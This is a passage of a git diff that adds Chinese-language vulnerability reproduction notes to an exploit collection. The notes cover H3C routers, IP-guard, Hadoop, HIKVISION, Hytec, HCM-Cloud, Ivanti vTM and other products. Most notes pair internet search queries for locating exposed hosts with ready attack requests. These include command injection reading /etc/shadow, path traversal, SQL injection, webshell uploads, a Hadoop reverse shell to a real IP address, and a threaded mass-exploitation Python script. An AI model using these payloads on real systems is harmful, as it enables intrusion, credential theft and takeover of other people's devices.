+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701757665612-01db350b-d4ee-40d2-ac84-bdcc020341e8.png](./img/9iCDf0Y97piuySfp/1701757665612-01db350b-d4ee-40d2-ac84-bdcc020341e8-786975.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076.png](./img/9iCDf0Y97piuySfp/1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076-784276.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ds6b5achi2o9k5hl>
\ No newline at end of file
diff --git a/H3C多系列路由器存在任意用户登录漏洞.md b/H3C多系列路由器存在任意用户登录漏洞.md
new file mode 100644
index 0000000..27bcc31
--- /dev/null
+++ b/H3C多系列路由器存在任意用户登录漏洞.md
@@ -0,0 +1,44 @@
+# H3C多系列路由器存在任意用户登录漏洞
+
+# 一、漏洞简介
+ H3C 企业路由器(ERN ERG2N GR 系列》存在任意用户登录和命令 执行漏洞，攻击者可通过访问nserLog in.asp/actionpalicy_status1./xxxx.cfg 接口，xxxx为设备型号（比如设备型号为 ER5200G2 ，即访问userLog in.asp/../actionpolicy_status/../ER5200G2.cfg），统过COOKIE 验证，进行目录穿越，获取 设备的明文配置文件，配置中有明文的web 管理员账号admin 的密码，登陆后台 即可通过开启 telenet 获取命令执行权限  
+
+# 二、影响版本
++ H3C多系列路由器
+
+# 三、资产测绘
++ hunter`app.name="H3C Router Management"`
++ 登录页面
+
+![1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd.png](./img/MqXw12ts-2hI9P3j/1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd-205034.png)
+
+# 四、漏洞复现
+1. 访问userLog in.asp/actionpalicy_status1./xxxx.cfg 接口，xxxx为设备型号（比如设备型号为 ER5200G2 ，即访问userLog in.asp/../actionpolicy_status/../ER5200G2.cfg）
+2. 根据设备型号修改payload
+
+```java
+GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1693536147392-494bee2a-1d0a-4c59-b943-d9628a7a00ef.png](./img/MqXw12ts-2hI9P3j/1693536147392-494bee2a-1d0a-4c59-b943-d9628a7a00ef-397355.png)
+
+3. <font style="color:rgba(0, 0, 0, 0.9);">密码就在</font>`<font style="color:rgba(0, 0, 0, 0.9);">vtypasswd</font>`<font style="color:rgba(0, 0, 0, 0.9);">字段</font>
+
+![1693536224274-36454c0c-1465-42d4-bb2a-8898f177df6a.png](./img/MqXw12ts-2hI9P3j/1693536224274-36454c0c-1465-42d4-bb2a-8898f177df6a-471592.png)
+
+4. 账户为`admin`
+
+![1693536284723-c565c1e4-eb3c-434d-8d79-7a0cdb06204b.png](./img/MqXw12ts-2hI9P3j/1693536284723-c565c1e4-eb3c-434d-8d79-7a0cdb06204b-398196.png)
+
+5. 可在`远程管理`->`远程telnet管理`处开启telnet获取命令执行权限
+
+![1693536401401-e5557bea-3c29-49ca-bdf4-9f1b8e4d2cdf.png](./img/MqXw12ts-2hI9P3j/1693536401401-e5557bea-3c29-49ca-bdf4-9f1b8e4d2cdf-114600.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wgzkiefvdexpuyq1>
\ No newline at end of file
diff --git a/H3C多系列路由器存在前台远程命令执行漏洞.md b/H3C多系列路由器存在前台远程命令执行漏洞.md
new file mode 100644
index 0000000..5ac5d32
--- /dev/null
+++ b/H3C多系列路由器存在前台远程命令执行漏洞.md
@@ -0,0 +1,37 @@
+# H3C多系列路由器存在前台远程命令执行漏洞
+
+# 一、漏洞简介
+ H3C多系列路由器存在前台远程命令执行漏洞。
+
+# 二、影响版本
++ H3C多系列路由器
+
+# 三、资产测绘
++ hunter`app.name="H3C Router Management"`
++ 登录页面
+
+![1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd.png](./img/z8D5fn4DzBurWTEr/1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd-011282.png)
+
+# 四、漏洞复现
+```java
+POST /goform/aspForm HTTP/1.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+Host: 
+
+CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);
+```
+
+![1708148458826-c9fecdad-19a8-4f2f-afb8-2edb86c89119.png](./img/z8D5fn4DzBurWTEr/1708148458826-c9fecdad-19a8-4f2f-afb8-2edb86c89119-875058.png)
+
+```java
+/test
+```
+
+![1708148479113-de8c50b3-1388-4543-b5ad-245ab43716a0.png](./img/z8D5fn4DzBurWTEr/1708148479113-de8c50b3-1388-4543-b5ad-245ab43716a0-505670.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tp0a94dpgkk64aqo>
\ No newline at end of file
diff --git a/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md b/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md
new file mode 100644
index 0000000..8a546c5
--- /dev/null
+++ b/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md
@@ -0,0 +1,23 @@
+# HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞
+
+瀚霖科技股份有限公司ISS-7000 v2网络网关服务器 /login_handler.cgi接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令，写入后门文件，获取服务器权限。
+
+## fofa
+
+```javascript
+icon_hash="-842942564"
+```
+
+## poc
+
+```javascript
+POST /login_handler.cgi HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+username=admin&password=admin|id&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
+```
+
+![image-20241108205108398](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082051455.png)
\ No newline at end of file
diff --git a/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md b/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md
new file mode 100644
index 0000000..708860b
--- /dev/null
+++ b/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+# HCM-Cloud云端专业人力资源平台download任意文件读取漏洞
+
+HCM-Cloud云端专业人力资源平台download任意文件读取漏洞
+
+## fofa
+
+```javascript
+icon_hash="-859381597"
+```
+
+## poc
+
+```javascript
+GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Connection: close
+```
+
+![3ccd7062314c3695db376759d9f74d02](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410241250278.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
\ No newline at end of file
diff --git a/HEYBBS2.1论坛search.php存在sql注入漏洞.md b/HEYBBS2.1论坛search.php存在sql注入漏洞.md
new file mode 100644
index 0000000..5ee2159
--- /dev/null
+++ b/HEYBBS2.1论坛search.php存在sql注入漏洞.md
@@ -0,0 +1,28 @@
+# HEYBBS2.1论坛search.php存在sql注入漏洞
+
+HEYBBS2.1论坛在search.php接口下存在sql注入漏洞
+
+## fofa
+
+```javascript
+Body="微社区, 微论坛, 微博客"
+```
+
+## poc
+
+```javascript
+GET /search.php?sosuo=qq%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0xc,user(),0xc),NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Referer: https://fofa.info/
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Pragma: no-cache
+Cache-Control: no-cache
+
+
+```
diff --git a/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md b/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md
new file mode 100644
index 0000000..110ec68
--- /dev/null
+++ b/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md
@@ -0,0 +1,31 @@
+# HSC Mailinspector loader存在任意文件读取漏洞(CVE-2024-34470)
+
+# 一、漏洞简介
+HSC Mailinspector是一款邮件安全解决方案，旨在保护企业邮件系统免受垃圾邮件、恶意软件和其他类型的网络威胁。该解决方案可以检测和过滤垃圾邮件、病毒、木马和其他类型的恶意软件，并提供详细的报告和日志记录，以帮助管理员跟踪和分析邮件流量。   HSC Mailinspector loader接口处存在任意文件读取漏洞(CVE-2024-34470)，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。  
+
+# 二、影响版本
++  HSC Mailinspector
+
+# 三、资产测绘
+```plain
+body="mailinspector/public"
+```
+
+![1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17.png](./img/dqMWRZ4U8g1HnlWV/1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17-597820.png)
+
+# 四、漏洞复现
+```plain
+GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe.png](./img/dqMWRZ4U8g1HnlWV/1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe-035461.png)
+
+
+
+> 更新: 2024-06-11 10:34:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pnb6lpu1pdfurixs>
\ No newline at end of file
diff --git a/Hadoop存在未授权访问导致的RCE.md b/Hadoop存在未授权访问导致的RCE.md
new file mode 100644
index 0000000..586b4bd
--- /dev/null
+++ b/Hadoop存在未授权访问导致的RCE.md
@@ -0,0 +1,53 @@
+# Hadoop存在未授权访问导致的RCE
+
+# 一、漏洞描述
+Hadoop的核心设计包括分布式文件系统（HDFS）和MapReduce编程模型。HDFS是一个高容错性的分布式文件系统，设计用于在低成本的硬件上运行，提供高吞吐量以访问大规模数据。而MapReduce则是一种处理大规模数据的计算模型，它将应用程序分解成许多小的任务，这些任务可以在分布式集群的任何节点上执行。Hadoop的这些特性使其成为一个适合处理海量数据的平台，广泛应用于大数据存储和处理领域。由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。
+
+# 二、影响版本
+Hadoop
+
+# 三、资产测绘
+```plain
+app="APACHE-hadoop-YARN"
+```
+
+![1730007748480-f12e937d-352a-4a44-8f45-4eadcefc02cd.png](./img/XntizMfXiFnObJzU/1730007748480-f12e937d-352a-4a44-8f45-4eadcefc02cd-735372.png)
+
+# 三、漏洞复现
+```plain
+POST /ws/v1/cluster/apps/new-application HTTP/1.1
+Host: 
+Content-Type: application/json
+Content-Length: 
+```
+
+![1730007792679-ad65176c-9062-4cb1-bde3-db16dcc3f638.png](./img/XntizMfXiFnObJzU/1730007792679-ad65176c-9062-4cb1-bde3-db16dcc3f638-482756.png)
+
+反弹shell
+
+```plain
+POST /ws/v1/cluster/apps HTTP/1.1
+Host: 
+Content-Type: application/json
+Content-Length: 256
+
+{
+  "application-id": "application_1234567890123_0001",
+  "application-name": "get-shell",
+  "am-container-spec": {
+    "commands": {
+      "command": "/bin/bash -i >& /dev/tcp/81.71.17.84/9999 0>&1"
+    }
+  },
+  "application-type": "YARN"
+}
+```
+
+![1730007867558-d3e6bed6-3b8b-4c27-9b67-29b40cb1395e.png](./img/XntizMfXiFnObJzU/1730007867558-d3e6bed6-3b8b-4c27-9b67-29b40cb1395e-570056.png)
+
+![1730007901286-aceda32c-bc50-40b7-9e28-fba103dfd98a.png](./img/XntizMfXiFnObJzU/1730007901286-aceda32c-bc50-40b7-9e28-fba103dfd98a-766970.png)
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dushc0i493wttgo1>
\ No newline at end of file
diff --git a/HiKVISION-综合安防管理平台-任意文件上传漏洞.md b/HiKVISION-综合安防管理平台-任意文件上传漏洞.md
new file mode 100644
index 0000000..cddd90d
--- /dev/null
+++ b/HiKVISION-综合安防管理平台-任意文件上传漏洞.md
@@ -0,0 +1,38 @@
+## fofa
+```
+app="HIKVISION-iSecure-Center"
+```
+
+## HiKVISION 综合安防管理平台 report 任意文件上传漏洞
+
+```
+POST /svm/api/external/report HTTP/1.1
+Host: 10.10.10.10
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
+
+------WebKitFormBoundary9PggsiM755PLa54a
+Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
+Content-Type: application/zip
+
+<%jsp的马%>
+
+------WebKitFormBoundary9PggsiM755PLa54a--
+
+马儿路径：/portal/ui/login/..;/..;/new.jsp
+
+```
+
+## HiKVISION 综合安防管理平台 files 任意文件上传漏洞
+```
+POST /center/api/files;.html HTTP/1.1
+Host: 10.10.10.10
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
+
+------WebKitFormBoundary9PggsiM755PLa54a
+Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
+Content-Type: application/zip
+
+<%jsp的马%>
+------WebKitFormBoundary9PggsiM755PLa54a--
+```
+![image](https://github.com/wy876/POC/assets/139549762/8e3f6c98-9d8d-4ede-bd92-e16baee49a8d)
diff --git a/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md b/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md
new file mode 100644
index 0000000..7f8f0c4
--- /dev/null
+++ b/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md
@@ -0,0 +1,25 @@
+# Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388)
+
+Hoverfly api/v2/simulation 接口存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```jade
+icon_hash="1357234275"
+```
+
+## poc
+
+```javascript
+PUT /api/v2/simulation HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+ 
+{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101027771.png)
\ No newline at end of file
diff --git a/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md b/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md
new file mode 100644
index 0000000..8687d0e
--- /dev/null
+++ b/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md
@@ -0,0 +1,12 @@
+## Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
+
+## fofa
+```
+title="index" && header="lighttpd/1.4.30"
+```
+
+### poc
+```
+
+/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921
+```
diff --git a/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md b/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md
new file mode 100644
index 0000000..df37452
--- /dev/null
+++ b/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md
@@ -0,0 +1,42 @@
+# Hytec Inter HWL-2511-SS路由器popen.cgi命令注入漏洞
+
+# 一、漏洞简介
+Hytec Inter HWL-2511-SS是日本Hytec Inter公司的一种工业 LTE 路由器和 Wi-Fi 接入点。 Hytec Inter HWL-2511-SS popen.cgi存在安全漏洞，允许攻击者以root权限执行任意命令。
+
+# 二、影响版本
++ Hytec Inter HWL-2511-SS
+
+# 三、资产测绘
++ hunter`app.name=="PROSCEND(及其他) Celluar Router "`
+
+![1692195674584-e5d0c9c1-db2b-4086-89d9-32e86c36007a.png](./img/4A0X6p-kZawMAx-b/1692195674584-e5d0c9c1-db2b-4086-89d9-32e86c36007a-554553.png)
+
++ 登录页面
+
+![1692195705957-a4726dd2-e296-4890-9a9c-4f2175496086.png](./img/4A0X6p-kZawMAx-b/1692195705957-a4726dd2-e296-4890-9a9c-4f2175496086-933108.png)
+
+# 四、漏洞复现
+```plain
+GET /cgi-bin/popen.cgi?command=ping%20-c%201.1.1.1;cat%20/etc/shadow&v=0.130303344313792 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+If-Modified-Since: Sun, 13 Oct 2019 19:17:17 GMT
+If-None-Match: "18111784"
+Te: trailers
+Connection: close
+```
+
+![1692195751951-2903e0d0-9813-49e6-91ac-4a1f0b7d58e6.png](./img/4A0X6p-kZawMAx-b/1692195751951-2903e0d0-9813-49e6-91ac-4a1f0b7d58e6-393174.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hy5l035eahzzbbys>
\ No newline at end of file
diff --git a/I-Doc-View任意文件上传漏洞.md b/I-Doc-View任意文件上传漏洞.md
new file mode 100644
index 0000000..1660184
--- /dev/null
+++ b/I-Doc-View任意文件上传漏洞.md
@@ -0,0 +1,30 @@
+
+## I Doc View任意文件上传漏洞
+I DOC VIEW是一个在线的文档查看器，其中的/html/2word接口因为处理不当，导致可以远程读取任意文件，通过这个接口导致服务器下载恶意的JSP进行解析，从而RCE。
+
+## POC构造
+流程：携带恶意link[href]的html -> 远程获取  -> 解析出href -> 远程获取恶意文件
+
+poc.html
+```html
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <title>test</title>  
+</head>
+<body>
+  <link href="/..\..\..\docview\poc.jsp">
+</body>
+</html>
+```
+然后构造 `..\..\..\docview\poc.jsp`  这个是文件
+![image](https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3)
+
+![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)
+
+## 漏洞分析
+```
+https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg
+https://mp.weixin.qq.com/s/mD4EcVmJ9QPmmMLh6KrZ0g
+```
diff --git a/IP-guard-WebServer-远程命令执行漏洞.md b/IP-guard-WebServer-远程命令执行漏洞.md
new file mode 100644
index 0000000..b97ca1e
--- /dev/null
+++ b/IP-guard-WebServer-远程命令执行漏洞.md
@@ -0,0 +1,107 @@
+## IP-guard WebServer 远程命令执行漏洞
+IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
+
+## 影响版本
+```
+< IP-guard WebServer 4.81.0307.0
+```
+
+## fofa
+```
+"IP-guard" && icon_hash="2030860561"
+```
+
+## poc
+```
+/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20dnslog
+```
+
+## 写php
+```
+GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+^<?php+@mb_eregi_replace('.*',$_POST['a'],'','ee');?^>+>1.php HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+## 漏洞复现
+
+![](./assets/20231109165256.png)
+![](./assets/20231109165333.png)
+
+## Python脚本
+```python
+#!/usr/bin/python3
+# -*- coding:utf-8 -*-
+# author:MDSEC
+# from:https://github.com/MD-SEC/MDPOCS
+# fofa:"IP-guard" && icon_hash="2030860561"
+# 
+
+
+import sys
+import requests
+import csv
+import urllib3
+import hashlib
+from concurrent.futures import ThreadPoolExecutor
+import time
+
+if len(sys.argv) != 2:
+    print(
+        '+----------------------------------------------------------------------------------------------------------+')
+    print(
+        '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
+    print(
+        '+-------------------------------------------------------------------------------------------------- -------+')
+    print(
+        '+ USE: python3 <filename> <hosts.txt>                                                                       +')
+    print(
+        '+ EXP: python3 Ip_Guard_Webserver_View_Rce_Poc.py url.txt                                                  +')
+    print(
+        '+-------------------------------------------------------------------------------------------------- --------+')
+    sys.exit()
+proxysdata = {
+'http': '127.0.0.1:8080'
+} 
+def poc(host):
+    if "http" in host:
+        url = host
+    else:
+        url ="http://"+host
+    host1=url.replace("http://","")
+    host2=host1.replace("https://","")
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+        "Accept-Encoding": "gzip, deflate, br",
+        "Host":"%s" % host2
+    }
+    vulurl = url + "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20www.baidu.com"
+    try:
+        start_time = time.time()
+        r = requests.get(vulurl, headers=headers)
+        end_time = time.time()
+        response_time = end_time - start_time
+        if r.status_code==200 and response_time >2 and response_time<6 :
+            print(host+" :一定能打")
+        elif r.status_code==200:   
+            print(host+" :大概率能打")
+        else:
+            print(host+" :不能打")
+    except:
+        return 0
+        print (host+":false")
+
+
+if __name__ == '__main__':
+    file = sys.argv[1]
+    data = open(file)
+    reader = csv.reader(data)
+    with ThreadPoolExecutor(50) as pool:
+        for row in reader:
+            pool.submit(poc, row[0])
+```
diff --git a/IP-guardWebServer权限绕过漏洞.md b/IP-guardWebServer权限绕过漏洞.md
new file mode 100644
index 0000000..3f83c31
--- /dev/null
+++ b/IP-guardWebServer权限绕过漏洞.md
@@ -0,0 +1,35 @@
+# IP-guard WebServer 权限绕过漏洞
+
+# 一、漏洞简介
+IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。由于IP-guard WebServer的权限验证机制中存在设计缺陷，远程攻击者能够规避安全验证，通过后端接口执行文件的任意读取和删除操作。
+
+# 二、影响版本
++ IP-guard
+
+# 三、资产测绘
++ hunter`web.icon=="210a3c89d4ab5effa18d6dd7a9627376"`
++ 特征
+
+![1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f.png](./img/KINBd9d7qOP907Rm/1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f-935578.png)
+
+# 四、漏洞复现
+```plain
+POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 64
+
+path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
+```
+
+![1713513510100-89d8adee-54fa-473d-9e4b-7066cb308103.png](./img/KINBd9d7qOP907Rm/1713513510100-89d8adee-54fa-473d-9e4b-7066cb308103-142878.png)
+
+
+
+> 更新: 2024-04-19 16:02:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dlylco77v8avu2od>
\ No newline at end of file
diff --git a/IP-guardWebServer远程命令执行漏洞.md b/IP-guardWebServer远程命令执行漏洞.md
new file mode 100644
index 0000000..c91f651
--- /dev/null
+++ b/IP-guardWebServer远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# IP-guard WebServer 远程命令执行漏洞
+
+# 一、漏洞简介
+IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。IP-guard WebServer 存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令，获取服务器控制权限。
+
+# 二、影响版本
++ IP-guard
+
+# 三、资产测绘
++ hunter`web.icon=="210a3c89d4ab5effa18d6dd7a9627376"`
++ 特征
+
+![1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f.png](./img/3T4Q8T2NsWY0JGug/1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f-939078.png)
+
+# 四、漏洞复现
+```plain
+GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+^<?php+phpinfo();+?^>+>2.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ipg_session=uiki60dds9f9jop2jpj0vn8h22aa3e1o
+Upgrade-Insecure-Requests: 1
+```
+
+![1699584258482-7fa4b92d-0349-42e7-acfb-46bde1b24107.png](./img/3T4Q8T2NsWY0JGug/1699584258482-7fa4b92d-0349-42e7-acfb-46bde1b24107-486349.png)
+
+获取命令执行结果
+
+```plain
+/ipg/static/appr/lib/flexpaper/php/2.php
+```
+
+![1699584306366-fbf98e4f-fd68-4cd6-9f88-28383acfde03.png](./img/3T4Q8T2NsWY0JGug/1699584306366-fbf98e4f-fd68-4cd6-9f88-28383acfde03-388051.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/opebo53vl523fg3s>
\ No newline at end of file
diff --git a/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md b/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md
new file mode 100644
index 0000000..dadd027
--- /dev/null
+++ b/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md
@@ -0,0 +1,53 @@
+# Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593)
+
+Ivanti Virtual Traffic Manager (vTM)多个版本存在身份验证绕过漏洞(CVE-2024-7593)，由于身份验证算法的错误实现，导致未经身份验证的远程攻击者绕过面向互联网的vTM管理控制台上的身份验证，未授权创建管理用户。
+
+## fofa
+
+```javascript
+"Pulse Secure vTM Administration Server"
+```
+
+## poc
+
+```python
+import requests
+
+# Set to target address
+admin_portal = 'https://1.1.1.1:9090'
+
+# User to create
+new_admin_name = 'ldwkadmin'
+new_admin_password = 'ldwkadmin1234'
+
+requests.packages.urllib3.disable_warnings() 
